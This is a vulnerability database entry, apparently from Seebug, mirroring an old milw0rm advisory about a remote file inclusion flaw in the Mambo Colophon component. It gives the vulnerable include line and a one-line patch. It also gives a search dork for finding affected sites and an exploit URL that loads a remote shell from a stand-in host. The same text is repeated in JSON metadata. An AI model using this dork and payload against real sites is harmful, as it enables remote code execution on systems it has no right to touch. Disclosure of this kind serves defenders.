Mambo Colophon Component <= 1.2 - Remote Inclusion Vulnerability
2014-07-01T00:00:00
ID SSV:63757 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
########### Command Mambo Colophon =<1.2 ##by #Drago84#########
Found By Drago84
Exclusive Security Italian Security
This bug allows a remote atacker to execute commands via rfi
page:
admin.colophon.php
bug:
require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");
path:
add in admin.colophon.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );
dork: inurl:com_colophon
expl:
htttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?
# milw0rm.com [2006-07-29]
{"type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "_object_type": "robots.models.seebug.SeebugBulletin", "viewCount": 2, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2017-11-19T13:32:47"}, "dependencies": {"references": [], "modified": "2017-11-19T13:32:47"}, "vulnersScore": -0.1}, "reporter": "Root", "title": "Mambo Colophon Component <= 1.2 - Remote Inclusion Vulnerability", "objectVersion": "1.4", "cvelist": [], "bulletinFamily": "exploit", "sourceHref": "https://www.seebug.org/vuldb/ssvid-63757", "cvss": {"score": 0.0, "vector": "NONE"}, "references": [], "enchantments_done": [], "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "href": "https://www.seebug.org/vuldb/ssvid-63757", "history": [], "id": "SSV:63757", "status": "cve,poc", "lastseen": "2017-11-19T13:32:47", "sourceData": "\n ########### Command Mambo Colophon =<1.2 ##by #Drago84#########\r\n\r\n Found By Drago84\r\nExclusive Security Italian Security\r\n\r\n This bug allows a remote atacker to execute commands via rfi\r\n\r\npage:\r\n admin.colophon.php\r\n\r\nbug:\r\n require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");\r\n\r\npath:\r\nadd in admin.colophon.php\r\ndefined( '_VALID_MOS' ) or die( 'hacking attemp.' );\r\n\r\ndork: inurl:com_colophon\r\n\r\nexpl:\r\nhtttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?\r\n\r\n# milw0rm.com [2006-07-29]\r\n\n ", "published": "2014-07-01T00:00:00"}